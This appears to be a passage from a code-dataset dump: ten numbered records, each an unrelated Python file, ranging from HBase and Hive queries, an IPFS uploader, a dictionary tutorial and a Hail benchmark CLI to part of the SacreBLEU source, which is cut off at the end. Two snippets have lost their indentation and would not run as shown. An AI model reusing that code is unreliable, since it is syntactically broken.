TBLPROPERTIES ("hbase.table.name"="CUSTOMERS");
SELECT yourcolumns
FROM tablenames
JOIN tablenames
WHERE condition
GROUP BY yourcolumns
HAVING aggregatecolumn condition
ORDER BY yourcolumns
'''
import pandas as pd
import happybase
import phoenixdb
from pyhive import hive
# --- HBase: scan the CUSTOMERS table via Thrift (happybase) ---
connection = happybase.Connection()
connection.open()
print('list of hbase tables {}'.format(connection.tables()))
customers = connection.table('CUSTOMERS')
keys = []
data_list = []
for key, data in customers.scan():
    keys.append(key)
    data_list.append(data)
# Column names come back as b'cf:<name>'; [3:] strips the 'cf:' family prefix.
hbase_columns = [x.decode('utf-8')[3:] for x in data_list[0].keys()]
print('len of hbase keys {}'.format(len(keys)))
print('hbase columns {}'.format(hbase_columns))
print('hbase columns len {}'.format(len(hbase_columns)))
# --- Flat file: load the pipe-delimited source CSV for comparison ---
df = pd.read_csv('customers-with-header-500.csv', delimiter='|', index_col='index')
df_columns = list(df.columns)
print('csv file shape {}'.format(df.shape))
print('csv columns {}'.format(df_columns))
# Compare column sets and row counts between HBase and the flat file.
print('hbase columns == csv columns: {}'.format(set(hbase_columns) == set(df_columns)))
print('hbase row count == csv row count: {}'.format(len(keys) == df.shape[0]))
# --- Phoenix: (re)create a SQL view over the HBase table and query it ---
url = 'http://localhost:8765/'
conn = phoenixdb.connect(url, autocommit=True)
cursor = conn.cursor()
query1 = 'DROP VIEW "CUSTOMERS"'
cursor.execute(query1)
query2 = 'CREATE VIEW "CUSTOMERS" (pk VARCHAR PRIMARY KEY, "cf"."first_name" VARCHAR, "cf"."last_name" VARCHAR, "cf"."company_name" VARCHAR, "cf"."address" VARCHAR, "cf"."city" VARCHAR, "cf"."county" VARCHAR, "cf"."state" VARCHAR, "cf"."zip" VARCHAR, "cf"."phone1" VARCHAR, "cf"."phone2" VARCHAR, "cf"."email" VARCHAR, "cf"."web" VARCHAR)'
cursor.execute(query2)
query3 = 'SELECT * FROM CUSTOMERS'
cursor.execute(query3)
data = cursor.fetchall()
print(data[:2])
# --- Hive: query the HBase-backed external table (see module docstring) ---
from pyhive import hive  # or import hive
cursor = hive.connect('localhost').cursor()
cursor.execute('SELECT * FROM customers_hive LIMIT 10')
result = cursor.fetchall()
print(len(result))
print(result)
|
9,566 | 857e3e04b99cb346fd89b34c0d14957d65b7ac38 | #公路工程工程量清单编码默认格式母节点为数字型式,子节点为-b字母形式,为使编码唯一便于数据处理,编制此脚本
import re
import pandas as pd
import os
def get_csv_path():
    # The original codes are stored as one column of a CSV file for easy reading.
    """Prompt repeatedly until the user enters the path of an existing file."""
    while True:
        path = input('enter csv path:')
        if os.path.isfile(path):
            return path
        print('csv file not exsit,try again:')
def unique_code():
    """Make highway BOQ (bill-of-quantities) item codes unique.

    Parent nodes look like ``<digits>-<digits>``; child nodes look like
    ``-<letter>-<digits>``.  Children are made unique by prefixing them with
    the most recently seen parent code.  The result is written next to the
    input file as ``code_csv_out.csv``.
    """
    path = get_csv_path()
    path_dir = os.path.dirname(path)
    frame1 = pd.read_csv(path, encoding='utf-8')
    list1 = list(frame1.iloc[:, 0])
    pat1 = re.compile(r'\d+-\d+')  # parent node: starts with digits
    list2 = []
    i = 100
    # Fix: initialize the running parent code; previously `cover` was unbound
    # (NameError) if the first row was a child node.
    cover = ''
    for code in list1:
        if code == '':
            # NOTE(review): pd.read_csv turns empty cells into NaN, not '' —
            # this branch may never fire; confirm the intended input format.
            list2.append(i)
            i += 100
        elif re.match(pat1, code):
            cover = code
            list2.append(cover)
        else:
            # Child node (e.g. '-b-1'): prefix with the current parent code.
            list2.append(cover + code)
    frame2 = pd.DataFrame(list2)
    frame2.to_csv(os.path.join(path_dir, 'code_csv_out.csv'), encoding='utf-8-sig')
if __name__=='__main__':
unique_code()
|
9,567 | 84d0c439fcee4339250ced11dd2264740cc20d9c | import ply.lex as lex
# Smoke-test print; note "hello word!" is presumably a typo for "hello world!".
print("hello word!")
|
9,568 | 797cedc9dc2a47713b9554e4f5975a4505ecf6d3 | #!/usr/bin/env python3
# encoding: utf-8
"""
@version: ??
@author: ami
@license: Apache Licence
@file: dictTest.py
@time: 2019/9/25 18:26
@tools: PyCharm
"""
def func():
    """Placeholder function from the file template; unused."""
    pass


class Main():
    """Placeholder class from the file template; unused."""
    def __init__(self):
        pass


if __name__ == '__main__':
    pass


# --- Basic dictionary literals, access, and membership ---
d = {'name': 'Bob', 'age': 40}
print(d)
d = {'spam': 2, 'ham': 1, 'eggs': 3}
print(d['spam'])
print(d)
print(len(d))
print('ham' in d)
print(list(d.keys()))
print(list(d.values()))
print(list(d.items()))
for i in d.items():
    print(i)
# --- In-place changes: assignment, deletion, new keys ---
d['ham'] = ['grill', 'bake', 'fry']
print(d)
del d['eggs']
print(d)
d['brunch'] = 'Bacon'
print(d)
print(list(d.values()))
print(list(d.keys()))
print(list(d.items()))
# --- get() with and without a default ---
print(d.get('ham'))
print(d.get('toast'))
print(d.get('toast', 88))
print(d)
# --- update() and pop() ---
d2 = {'toast': 4, 'muffin': 5}
d.update(d2)
print(d)
print(d.pop('muffin'))
print(d.pop('toast'))
print(d)
# --- Using a dict as a lookup table (year -> movie) ---
table = {
    '1975': 'Holy Grail',
    '1979': 'Life of Brain',
    '1983': 'The Meaning of Life'
}
year = '1983'
movie = table[year]
print(movie)
for year in table:
    print(year + '\t' + table[year])
# --- Inverse mapping (movie -> year) and reverse lookups by value ---
table2 = {
    'Holy Grail': '1975',
    'Life of Brain': '1979',
    'The Meaning of Life': '1983'
}
print(table2['Holy Grail'])
print(list(table2.items()))
year_ = [title for (title, year) in table2.items() if year == '1975']
print(year_)
K = 'Holy Grail'
print(table2[K])
V = '1975'
key = [key for (key, value) in table2.items() if value == V]
print(key)
key = [key for key in table2.keys() if table2[key] == V]
print(key)
# --- Sparse "matrix" keyed by coordinate tuples ---
Matrix = {}
Matrix[(2, 3, 4)] = 88
Matrix[(7, 8, 9)] = 99
X = 2
Y = 3
Z = 4
z_ = Matrix[(X, Y, Z)]
print(z_)
print(Matrix)
# Three ways to handle a missing key: membership test, try/except, get().
if (2, 3, 6) in Matrix:
    print(Matrix[(2, 3, 6)])
else:
    print(0)
try:
    print(Matrix[(2, 3, 6)])
except KeyError:
    print(0)
print(Matrix.get((2, 3, 4), 0))
print(Matrix.get((2, 3, 6), 0))
# --- Dicts as records, including nested structures ---
rec = {}
rec['name'] = 'Bob'
rec['age'] = 40.5
rec['job'] = 'developer/manager'
print(rec['name'])
rec = {
    'name': 'Bob',
    'jobs': ['developer', 'manager'],
    'web': 'www.bobs.org/?Bob',
    'home': {'state': 'Overworked', 'zip': 12345}
}
print(rec['name'])
print(rec['jobs'])
print(rec['jobs'][1])
print(rec['home']['zip'])
db = []
other = {
    'name': 'other',
    'jobs': ['hr', 'manager'],
    'web': 'www.hr.org',
    'home': {'state': 'Overworked', 'zip': 55555}
}
db.append(rec)
db.append(other)
print(db[0]['jobs'])
db = {}
db['bob'] = rec
db['sue'] = other
db['bob']['jobs']
# --- Alternative construction forms: literal, keywords, pairs, fromkeys, zip ---
age_ = {'name': 'Bob', 'age': 40}
print(age_)
d = {}
d['name'] = 'sue'
d['age'] = 50
print(d)
di = dict(name='Bob', age=56)
print(di)
di = dict([('name', 'Bob'), ('age', 55)])
print(di)
fromkeys = dict.fromkeys(['a', 'b'], 0)
print(fromkeys)
iterator = zip(['a', 'b', 'c'], [1, 2, 3])
print(iterator)
d = dict(zip(['a', 'b', 'c'], [1, 2, 3]))
print(d)
# --- Dict comprehensions ---
d = {k: v for (k, v) in zip(['a', 'b', 'c'], [1, 2, 3])}
print(d)
d = {x: x ** 2 for x in [1, 2, 3, 4]}
print(d)
d2 = {x: x ** 2 for x in range(4)}
print(d2)
d = {c: c * 4 for c in 'SPAM'}
print(d)
d = {c.lower(): c + '!' for c in ['spam', 'eggs', 'ham']}
print(d)
d = dict.fromkeys(['a', 'b', 'c'], 0)
print(d)
d = {k: 0 for k in ['a', 'b', 'c']}
print(d)
d = dict.fromkeys('spam')
print(d)
d = dict.fromkeys('spam', 0)
print(d)
d = {k: None for k in 'spam'}
print(d)
# --- View objects: keys(), values(), items() are lazy views, not lists ---
d = dict(a=1, b=2, c=3)
print(d)
k = d.keys()
print(k)
# print(k[0])
print(list(k)[0])
v = d.values()
print(v)
print(list(v))
print(d.items())
print(list(d.items()))
for k in d.keys(): print(k)
for key in d: print(key)
# Sorting {'a': 1, 'b': 2, 'c': 3} by key
print(d)
Ks = d.keys()
print(Ks)
Ks = list(Ks)
Ks.sort()
print(Ks)
for k in Ks: print(k, d[k])
print("-------"*6)
D = {'b': 2, 'c': 3, 'a': 1}
Ks = D.keys()
|
9,569 | cc985ae061c04696dbf5114273befd62321756ae | __title__ = 'pyaddepar'
# Package metadata for pyaddepar.
__version__ = '0.6.0'
__author__ = 'Thomas Schmelzer'
__license__ = 'MIT'
__copyright__ = 'Copyright 2019 by Lobnek Wealth Management' |
9,570 | 79ff164c36cc5f0a2382a571ec183952a03e66cc | import csv
import hashdate as hd
with open('Grainger_Library.csv', newline='') as f:
reader = csv.reader(f)
data = list(reader)
del data[0]
gld = []
glo = []
data.sort(key=lambda x:x[1])
for i in range(0,len(data)):
gld.append((data[i][1],data[i][2]))
print('ahd:')
#print(ahd)
glh = hd.hashdate(365,20200101)
for i in range(0,len(gld)):
glh.insert(gld[i][0], gld[i][1])
print('ahh:')
glh.display()
for i in range(0,len(glh.t)):
if glh.t[i] != None:
glo.append((glh.outd(i),glh.outn(i)))
#print(ahh.outd(i))
print('aho:')
print(glo) |
9,571 | 7ca88d451ad702e5a8e532da3e3f5939cfaa7215 | import argparse
import subprocess
import os
def get_files(dir_path, ext='.png'):
    """Return the full paths of files in *dir_path* whose names end with *ext*.

    Fix: the original tested ``ext in fp``, which also matched names that
    merely *contain* the extension (e.g. ``a.png.bak``); a suffix check
    matches the evident intent.
    """
    names = os.listdir(dir_path)
    return [os.path.join(dir_path, name) for name in names if name.endswith(ext)]
def ipfs_add_local(file_path):
    """Add *file_path* to the local IPFS node via the ``ipfs`` CLI.

    Returns the CID reported by ``ipfs add``, or "" when the output cannot
    be parsed (e.g. the add failed and printed nothing useful).
    """
    proc = subprocess.run(['ipfs', 'add', file_path], capture_output=True, text=True)
    stdout = proc.stdout
    try:
        # `ipfs add` prints "added <cid> <name>"; the CID is the second token.
        return stdout.split()[1]
    except IndexError as e:
        print(e)
        print(stdout)
        return ""
def pin_with_pinata(cid, name):
    """Pin *cid* under *name* on the pre-configured 'pinata' remote pinning service."""
    proc = subprocess.run(['ipfs', 'pin', 'remote', 'add', '--service=pinata', f'--name={name}', str(cid)], capture_output=True, text=True)
    print(f'Uploaded cid: {cid}')
    # print(proc.stdout)
if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Batch IPFS file uploading')
    parser.add_argument('-i', '--input', help='Path to directory containing media to upload', required=True)
    args = vars(parser.parse_args())

    # Upload every matching file, remembering name -> CID for the report.
    files_to_upload = get_files(args['input'])
    info = {}
    for fp in files_to_upload:
        print(fp)
        cid = ipfs_add_local(fp)
        if cid == "":
            print(f'{fp} failed to upload!')
            continue
        name = os.path.basename(fp)
        info[name] = {'cid': cid}
        pin_with_pinata(cid, name)

    # Write a "name, cid" summary next to the input files.  The `with`
    # statement closes the file; the original's trailing f.close() was
    # redundant and has been removed.
    with open(f'{args["input"]}/result.csv', 'w') as f:
        for fn in sorted(info.keys()):
            cid = info[fn]['cid']
            f.write(f'{fn}, {cid}\n')
|
9,572 | d4625dd743dd6648044e40b02743ae80f4caea36 | import argparse
import datetime
import json
import os
import sys
import hail as hl
from .utils import run_all, run_pattern, run_list, RunConfig
from .. import init_logging
def main(args):
    """Run the selected Hail benchmarks and emit the collected timings as JSON."""
    init_logging()
    records = []

    def handler(stats):
        # Collect per-benchmark stats as each benchmark reports them.
        records.append(stats)

    data_dir = args.data_dir or os.environ.get('HAIL_BENCHMARK_DIR') or '/tmp/hail_benchmark_data'
    profiler_path = os.environ.get('ASYNC_PROFILER_HOME')
    if args.profile and profiler_path is None:
        raise KeyError("In order to use --profile, you must download async-profiler and set `ASYNC_PROFILER_HOME`")
    config = RunConfig(args.n_iter, handler, noisy=not args.quiet, timeout=args.timeout, dry_run=args.dry_run,
                       data_dir=data_dir, cores=args.cores, verbose=args.verbose, log=args.log,
                       profiler_path=profiler_path, profile=args.profile, prof_fmt=args.prof_fmt)
    # --tests and --pattern may be combined; with neither, run everything.
    if args.tests:
        run_list(args.tests.split(','), config)
    if args.pattern:
        run_pattern(args.pattern, config)
    if not args.pattern and not args.tests:
        run_all(config)
    if args.dry_run:
        return

    # Attach environment metadata so results are comparable across runs.
    data = {'config': {'cores': args.cores,
                       'version': hl.__version__,
                       'timestamp': str(datetime.datetime.now()),
                       'system': sys.platform},
            'benchmarks': records}
    if args.output:
        with open(args.output, 'w') as out:
            json.dump(data, out)
    else:
        print(json.dumps(data))
def register_main(subparser) -> 'None':
    """Register the ``run`` subcommand and its command-line options on *subparser*."""
    parser = subparser.add_parser(
        'run',
        help='Run Hail benchmarks locally.',
        description='Run Hail benchmarks locally.'
    )
    parser.add_argument('--tests', '-t',
                        type=str,
                        required=False,
                        help='Run specific comma-delimited tests instead of running all tests.')
    parser.add_argument('--cores', '-c',
                        type=int,
                        default=1,
                        help='Number of cores to use.')
    parser.add_argument('--pattern', '-k', type=str, required=False,
                        help='Run all tests that substring match the pattern')
    parser.add_argument("--n-iter", "-n",
                        type=int,
                        default=3,
                        help='Number of iterations for each test.')
    parser.add_argument("--log", "-l",
                        type=str,
                        help='Log file path')
    parser.add_argument("--quiet", "-q",
                        action="store_true",
                        help="Do not print testing information to stderr in real time.")
    parser.add_argument("--verbose", "-v",
                        action="store_true",
                        help="Do not silence Hail logging to standard output.")
    parser.add_argument("--output", "-o",
                        type=str,
                        help="Output file path.")
    parser.add_argument("--data-dir", "-d",
                        type=str,
                        help="Data directory.")
    parser.add_argument('--timeout',
                        type=int,
                        default=1800,
                        help="Timeout in seconds after which benchmarks will be interrupted")
    parser.add_argument('--dry-run',
                        action='store_true',
                        help='Print benchmarks to execute, but do not run.')
    parser.add_argument('--profile', '-p',
                        choices=['cpu', 'alloc', 'itimer'],
                        nargs='?', const='cpu',
                        help='Run with async-profiler.')
    parser.add_argument('--prof-fmt', '-f',
                        choices=['html', 'flame', 'jfr'],
                        default='html',
                        help='Choose profiler output.')
    # Dispatch hook: the top-level driver later calls args.main(args).
    parser.set_defaults(main=main)
|
9,573 | 8d8f1f0dbb76b5c536bd1a2142bb61c51dd75075 | import pandas as pd
import numpy as np

# Visit log: one row per (hospital, date) observation.
df = pd.DataFrame([['Hospital1', '2019-10-01'],
                   ['Hospital2', '2019-10-01'],
                   ['Hospital3', '2019-10-01'],
                   ['Hospital1', '2019-10-01'],
                   ['Hospital2', '2019-10-02'],
                   ['Hospital3', '2019-10-02'],
                   ['Hospital2', '2019-10-03'],
                   ['Hospital2', '2019-10-04'],
                   ['Hospital3', '2019-10-04'],
                   ['Hospital3', '2019-10-05'],
                   ['Hospital1', '2019-10-06'],
                   ['Hospital1', '2019-10-07'],
                   ['Hospital1', '2019-10-08']],
                  columns=['Hospital_Name', 'Date'])
# Wide table: per-hospital counts for specific dates.
df2 = pd.DataFrame([['Hospital1',12,15,16,12],
                    ['Hospital2',10,17,14,12],
                    ['Hospital2',15,20,12,12]],
                   columns=['Hospital_Name', '2019-10-01', '2019-10-02', '2019-10-03', '2019-10-04'])
# Count rows per hospital (np.size counts occurrences of the Date column).
print(pd.pivot_table(df, values='Date', index='Hospital_Name', aggfunc=np.size))
print(df2.sum()) |
9,574 | 4f1956b34ac3b55b2d40220b79816c139b4a2f5c | import setuptools
# Minimal packaging configuration for the cppersist package.
setuptools.setup(
    name='cppersist',
    install_requires=['Eve']
)
|
9,575 | 8adcd75e925fe0c5a50b2fc7dc8c472a9610b4f2 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2017--2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You may not
# use this file except in compliance with the License. A copy of the License
# is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
"""
SacreBLEU provides hassle-free computation of shareable, comparable, and reproducible BLEU scores.
Inspired by Rico Sennrich's `multi-bleu-detok.perl`, it produces the official WMT scores but works with plain text.
It also knows all the standard test sets and handles downloading, processing, and tokenization for you.
See the [README.md] file for more information.
"""
import argparse
import gzip
import hashlib
import io
import logging
import math
import os
import portalocker
import re
import sys
import ssl
import urllib.request
from collections import Counter
from itertools import zip_longest
from typing import List, Iterable, Tuple, Union
from .tokenizer import TOKENIZERS, TokenizeMeCab
from .dataset import DATASETS, DOMAINS, COUNTRIES, SUBSETS
from . import __version__ as VERSION
sacrelogger = logging.getLogger('sacrebleu')
try:
# SIGPIPE is not available on Windows machines, throwing an exception.
from signal import SIGPIPE
# If SIGPIPE is available, change behaviour to default instead of ignore.
from signal import signal, SIG_DFL
signal(SIGPIPE, SIG_DFL)
except ImportError:
sacrelogger.warning('Could not import signal.SIGPIPE (this is expected on Windows machines)')
# Where to store downloaded test sets.
# Define the environment variable $SACREBLEU, or use the default of ~/.sacrebleu.
#
# Querying for a HOME environment variable can result in None (e.g., on Windows)
# in which case the os.path.join() throws a TypeError. Using expanduser() is
# a safe way to get the user's home folder.
USERHOME = os.path.expanduser("~")
SACREBLEU_DIR = os.environ.get('SACREBLEU', os.path.join(USERHOME, '.sacrebleu'))
# n-gram order. Don't change this.
NGRAM_ORDER = 4
# Default values for CHRF
CHRF_ORDER = 6
# default to 2 (per http://www.aclweb.org/anthology/W16-2341)
CHRF_BETA = 2
# The default floor value to use with `--smooth floor`
SMOOTH_VALUE_DEFAULT = {'floor': 0.0, 'add-k': 1}
DEFAULT_TOKENIZER = '13a'
def smart_open(file, mode='rt', encoding='utf-8'):
    """Open *file* for text I/O, transparently using gzip for ``.gz`` paths.

    :param file: The file to read.
    :param mode: The file mode (read, write).
    :param encoding: The file encoding.
    """
    # Choose the opener by extension; both share the same keyword interface.
    opener = gzip.open if file.endswith('.gz') else open
    return opener(file, mode=mode, encoding=encoding, newline="\n")
def my_log(num):
    """
    Floors the log function.

    :param num: the number
    :return: ``log(num)``, or a very large negative constant when *num* is 0
    """
    return -9999999999 if num == 0.0 else math.log(num)
def bleu_signature(args, numrefs):
    """
    Builds a signature that uniquely identifies the scoring parameters used.
    :param args: the arguments passed into the script
    :param numrefs: the number of references used
    :return: the signature
    """
    # Abbreviations for the signature (used with --short).
    abbr = {
        'test': 't',
        'lang': 'l',
        'smooth': 's',
        'case': 'c',
        'tok': 'tok',
        'numrefs': '#',
        'version': 'v',
        'origlang': 'o',
        'subset': 'S',
    }

    signature = {'tok': args.tokenize,
                 'version': VERSION,
                 'smooth': args.smooth,
                 'numrefs': numrefs,
                 'case': 'lc' if args.lc else 'mixed'}

    # For the Japanese tokenizer, add a dictionary type and its version to the signature.
    if args.tokenize == "ja-mecab":
        signature['tok'] += "-" + TokenizeMeCab().signature()

    # Optional fields only appear when set on the command line.
    if args.test_set is not None:
        signature['test'] = args.test_set

    if args.langpair is not None:
        signature['lang'] = args.langpair

    if args.origlang is not None:
        signature['origlang'] = args.origlang
    if args.subset is not None:
        signature['subset'] = args.subset

    # Keys are sorted so the signature string is deterministic.
    sigstr = '+'.join(['{}.{}'.format(abbr[x] if args.short else x, signature[x]) for x in sorted(signature.keys())])

    return sigstr
def chrf_signature(args, numrefs):
    """
    Builds a signature that uniquely identifies the scoring parameters used.
    :param args: the arguments passed into the script
    :param numrefs: the number of references used
    :return: the chrF signature
    """
    # Abbreviations for the signature (used with --short).
    abbr = {
        'test': 't',
        'lang': 'l',
        'numchars': 'n',
        'space': 's',
        'case': 'c',
        'numrefs': '#',
        'version': 'v',
        'origlang': 'o',
        'subset': 'S',
    }

    signature = {'version': VERSION,
                 'space': args.chrf_whitespace,
                 'numchars': args.chrf_order,
                 'numrefs': numrefs,
                 'case': 'lc' if args.lc else 'mixed'}

    # Optional fields only appear when set on the command line.
    if args.test_set is not None:
        signature['test'] = args.test_set

    if args.langpair is not None:
        signature['lang'] = args.langpair

    if args.origlang is not None:
        signature['origlang'] = args.origlang
    if args.subset is not None:
        signature['subset'] = args.subset

    # Keys are sorted so the signature string is deterministic.
    sigstr = '+'.join(['{}.{}'.format(abbr[x] if args.short else x, signature[x]) for x in sorted(signature.keys())])

    return sigstr
def extract_ngrams(line, min_order=1, max_order=NGRAM_ORDER) -> Counter:
    """Extracts all the ngrams (min_order <= n <= max_order) from a sequence of tokens.

    :param line: A segment containing a sequence of words.
    :param min_order: Minimum n-gram length (default: 1).
    :param max_order: Maximum n-gram length (default: NGRAM_ORDER).
    :return: a Counter mapping each n-gram (space-joined) to its count
    """
    tokens = line.split()
    counts = Counter()
    for order in range(min_order, max_order + 1):
        # Slide a window of length `order` over the token list.
        counts.update(' '.join(tokens[start:start + order])
                      for start in range(len(tokens) - order + 1))
    return counts
def extract_char_ngrams(s: str, n: int) -> Counter:
    """
    Count the character n-grams of order *n* appearing in string *s*.
    """
    return Counter(s[start:start + n] for start in range(len(s) - n + 1))
def ref_stats(output, refs):
    """For one system output line and its references, gather BLEU reference stats.

    Returns a triple of:
    - the merged reference n-gram counts (maximum count per n-gram over all refs),
    - the length difference to the closest reference,
    - the length of the closest reference (ties broken by the shorter one).
    """
    merged_ngrams = Counter()
    best_diff = None
    best_len = None
    out_len = len(output.split())
    for ref in refs:
        ref_tokens = ref.split()
        ref_len = len(ref_tokens)
        diff = abs(out_len - ref_len)
        # Track the reference closest in length; on a tie prefer the shorter one.
        if best_diff is None or diff < best_diff or (diff == best_diff and ref_len < best_len):
            best_diff = diff
            best_len = ref_len
        for ngram, count in extract_ngrams(ref).items():
            if count > merged_ngrams[ngram]:
                merged_ngrams[ngram] = count
    return merged_ngrams, best_diff, best_len
def _clean(s):
"""
Removes trailing and leading spaces and collapses multiple consecutive internal spaces to a single one.
:param s: The string.
:return: A cleaned-up string.
"""
return re.sub(r'\s+', ' ', s.strip())
def process_to_text(rawfile, txtfile, field: int=None):
    """Processes a raw file (SGML, XML, plain text, or TSV) into a plain-text file.

    The output file is only (re)built when it is missing or empty.

    :param rawfile: the input file (possibly SGML)
    :param txtfile: the plaintext file
    :param field: For TSV files, which field to extract.
    """
    if not os.path.exists(txtfile) or os.path.getsize(txtfile) == 0:
        sacrelogger.info("Processing %s to %s", rawfile, txtfile)
        # The original duplicated identical branches for .sgm/.sgml and .xml
        # (IWSLT); both extract the payload of <seg> lines, so merge them.
        if rawfile.endswith(('.sgm', '.sgml', '.xml')):
            with smart_open(rawfile) as fin, smart_open(txtfile, 'wt') as fout:
                for line in fin:
                    if line.startswith('<seg '):
                        print(_clean(re.sub(r'<seg.*?>(.*)</seg>.*?', '\\1', line)), file=fout)
        elif rawfile.endswith('.txt'):  # wmt17/ms
            with smart_open(rawfile) as fin, smart_open(txtfile, 'wt') as fout:
                for line in fin:
                    print(line.rstrip(), file=fout)
        elif rawfile.endswith('.tsv'):  # MTNT
            with smart_open(rawfile) as fin, smart_open(txtfile, 'wt') as fout:
                for line in fin:
                    print(line.rstrip().split('\t')[field], file=fout)
def print_test_set(test_set, langpair, side, origlang=None, subset=None):
    """Prints to STDOUT the specified side of the specified test set.

    :param test_set: the test set to print
    :param langpair: the language pair
    :param side: 'src' for source, 'ref' for reference
    :param origlang: print only sentences with a given original language (2-char ISO639-1 code), "non-" prefix means negation
    :param subset: print only sentences whose document annotation matches a given regex
    """
    files = download_test_set(test_set, langpair)
    # download_test_set() returns the source file first, then the references.
    if side == 'src':
        files = files[:1]
    elif side == 'ref':
        files = files[1:]
    streams = [smart_open(path) for path in files]
    streams = _filter_subset(streams, test_set, langpair, origlang, subset)
    # For 'both', source and reference(s) are pasted together tab-separated.
    for lines in zip(*streams):
        print('\t'.join(line.rstrip() for line in lines))
def download_test_set(test_set, langpair=None):
    """Downloads the specified test to the system location specified by the SACREBLEU environment variable.

    :param test_set: the test set to download
    :param langpair: the language pair (needed for some datasets)
    :return: the set of processed files
    """
    outdir = os.path.join(SACREBLEU_DIR, test_set)
    os.makedirs(outdir, exist_ok=True)

    # NOTE(review): the fallback length is taken from the whole dataset dict,
    # not its 'data' list; zip() below truncates, so this is harmless as long
    # as the dict has at least as many keys as there are tarballs — confirm.
    expected_checksums = DATASETS[test_set].get('md5', [None] * len(DATASETS[test_set]))
    for dataset, expected_md5 in zip(DATASETS[test_set]['data'], expected_checksums):
        tarball = os.path.join(outdir, os.path.basename(dataset))
        rawdir = os.path.join(outdir, 'raw')

        # Serialize download + extraction across concurrent processes.
        lockfile = '{}.lock'.format(tarball)
        with portalocker.Lock(lockfile, 'w', timeout=60):
            if not os.path.exists(tarball) or os.path.getsize(tarball) == 0:
                sacrelogger.info("Downloading %s to %s", dataset, tarball)
                try:
                    with urllib.request.urlopen(dataset) as f, open(tarball, 'wb') as out:
                        out.write(f.read())
                except ssl.SSLError:
                    sacrelogger.warning('An SSL error was encountered in downloading the files. If you\'re on a Mac, '
                                        'you may need to run the "Install Certificates.command" file located in the '
                                        '"Python 3" folder, often found under /Applications')
                    sys.exit(1)

                # Check md5sum
                if expected_md5 is not None:
                    md5 = hashlib.md5()
                    with open(tarball, 'rb') as infile:
                        for line in infile:
                            md5.update(line)
                    if md5.hexdigest() != expected_md5:
                        sacrelogger.error('Fatal: MD5 sum of downloaded file was incorrect (got {}, expected {}).'.format(md5.hexdigest(), expected_md5))
                        sacrelogger.error('Please manually delete "{}" and rerun the command.'.format(tarball))
                        sacrelogger.error('If the problem persists, the tarball may have changed, in which case, please contact the SacreBLEU maintainer.')
                        sys.exit(1)
                    else:
                        sacrelogger.info('Checksum passed: {}'.format(md5.hexdigest()))

                # Extract the tarball.
                # NOTE(review): extractall() on an untrusted archive can write outside
                # `rawdir` (path traversal); tolerable here only because the archives
                # are checksummed project data.
                sacrelogger.info('Extracting %s', tarball)
                if tarball.endswith('.tar.gz') or tarball.endswith('.tgz'):
                    import tarfile
                    with tarfile.open(tarball) as tar:
                        tar.extractall(path=rawdir)
                elif tarball.endswith('.zip'):
                    import zipfile
                    # Bug fix: the original bound the open archive to the name
                    # `zipfile`, shadowing the module imported one line above.
                    with zipfile.ZipFile(tarball, 'r') as zf:
                        zf.extractall(path=rawdir)

    found = []

    # Process the files into plain text
    languages = DATASETS[test_set].keys() if langpair is None else [langpair]
    for pair in languages:
        # Skip metadata keys such as 'data', 'md5', or 'description'.
        if '-' not in pair:
            continue

        src, tgt = pair.split('-')

        rawfile = DATASETS[test_set][pair][0]
        field = None  # used for TSV files
        if rawfile.endswith('.tsv'):
            field, rawfile = rawfile.split(':', maxsplit=1)
            field = int(field)
        rawpath = os.path.join(rawdir, rawfile)
        outpath = os.path.join(outdir, '{}.{}'.format(pair, src))
        process_to_text(rawpath, outpath, field=field)
        found.append(outpath)

        refs = DATASETS[test_set][pair][1:]
        for i, ref in enumerate(refs):
            field = None
            if ref.endswith('.tsv'):
                field, ref = ref.split(':', maxsplit=1)
                field = int(field)
            rawpath = os.path.join(rawdir, ref)
            # Multiple references get a numeric suffix; a single one does not.
            if len(refs) >= 2:
                outpath = os.path.join(outdir, '{}.{}.{}'.format(pair, tgt, i))
            else:
                outpath = os.path.join(outdir, '{}.{}'.format(pair, tgt))
            process_to_text(rawpath, outpath, field=field)
            found.append(outpath)

    return found
class Result:
    """Base class for metric results; subclasses must provide a format() method."""

    def __init__(self, score: float):
        self.score = score

    def __str__(self):
        # Delegate string rendering to the subclass-specific formatter.
        return self.format()
class BLEU(Result):
    """Holds a corpus BLEU score together with its sufficient statistics."""

    def __init__(self, score: float, counts, totals, precisions, bp, sys_len, ref_len):
        super().__init__(score)
        self.counts = counts          # clipped n-gram matches per order
        self.totals = totals          # total system n-grams per order
        self.precisions = precisions  # per-order precisions (percent)
        self.bp = bp                  # brevity penalty
        self.sys_len = sys_len
        self.ref_len = ref_len

    def format(self, width=2):
        """Render the classic multi-bleu style report line."""
        prec_str = "/".join("{:.1f}".format(p) for p in self.precisions)
        template = ('BLEU = {score:.{width}f} {precisions} '
                    '(BP = {bp:.3f} ratio = {ratio:.3f} '
                    'hyp_len = {sys_len:d} ref_len = {ref_len:d})')
        return template.format(score=self.score,
                               width=width,
                               precisions=prec_str,
                               bp=self.bp,
                               ratio=self.sys_len / self.ref_len,
                               sys_len=self.sys_len,
                               ref_len=self.ref_len)
class CHRF(Result):
    """Holds a chrF score (corpus- or sentence-level)."""

    def __init__(self, score: float):
        super().__init__(score)

    def format(self, width=2):
        """Render the score as a fixed-precision float string."""
        return '{score:.{width}f}'.format(score=self.score, width=width)
def compute_bleu(correct: List[int],
                 total: List[int],
                 sys_len: int,
                 ref_len: int,
                 smooth_method = 'none',
                 smooth_value = None,
                 use_effective_order = False) -> BLEU:
    """Computes BLEU score from its sufficient statistics. Adds smoothing.

    Smoothing methods (citing "A Systematic Comparison of Smoothing Techniques for Sentence-Level BLEU",
    Boxing Chen and Colin Cherry, WMT 2014: http://aclweb.org/anthology/W14-3346)

    - exp: NIST smoothing method (Method 3)
    - floor: Method 1
    - add-k: Method 2 (generalizing Lin and Och, 2004)
    - none: do nothing.

    NOTE: with smooth_method='add-k' the `correct` and `total` lists are
    modified in place; pass copies if the caller reuses them afterwards.

    :param correct: List of counts of correct ngrams, 1 <= n <= NGRAM_ORDER
    :param total: List of counts of total ngrams, 1 <= n <= NGRAM_ORDER
    :param sys_len: The cumulative system length
    :param ref_len: The cumulative reference length
